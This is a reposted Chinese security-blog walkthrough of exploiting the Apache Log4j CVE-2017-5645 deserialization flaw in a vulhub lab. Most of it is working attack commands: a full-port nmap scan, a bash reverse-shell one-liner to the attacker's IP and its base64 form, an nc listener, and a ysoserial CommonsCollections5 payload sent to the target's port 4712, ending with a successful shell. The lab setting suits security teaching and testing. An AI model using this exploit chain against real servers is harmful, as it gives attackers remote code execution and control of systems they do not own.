Log4j CVE-2017-5645反序列化漏洞

admin 2025年1月22日10:00:36评论8 views字数 914阅读3分2秒阅读模式

Log4j CVE-2017-5645反序列化漏洞

影响范围

Apache Log4j 2.x <= 2.8.2

漏洞成因

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之 前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

漏洞利用

环境准备

名称
IP
攻击机
192.168.75.162
靶机
192.168.75.146

首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.75.146:8983即可

cd vulhub-master/log4j/CVE-2017-5645
docker-compose up -d

然后进入攻击机里使用nmap扫描全端口:

nmap -sS 192.168.75.146 -p 1-65535 -v
Log4j CVE-2017-5645反序列化漏洞
image-20220725135637339

漏洞复现

首先准备好生成利用的工具:ysoserial.jar

工具验证漏洞是否存在

Log4j CVE-2017-5645反序列化漏洞
image-20220725142627138
Log4j CVE-2017-5645反序列化漏洞
image-20220725142656093

可以看出存在log4j漏洞

POC:

//反弹shell命令,注意替换为自己的
bash -i >& /dev/tcp/192.168.75.162/6666 0>&1
//base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=

接下来新打开一个cmd窗口执行以下命令:

nc -lvvp 6666

监听启动后我们使用payload:

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" | nc 192.168.75.146 4712

访问上述地址后,可以看到如下图,反弹shell成功,此漏洞利用成功

Log4j CVE-2017-5645反序列化漏洞
image-20220725152235839

原文始发于微信公众号(0xh4ck3r):Log4j CVE-2017-5645反序列化漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月22日10:00:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Log4j CVE-2017-5645反序列化漏洞http://cn-sec.com/archives/3650451.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息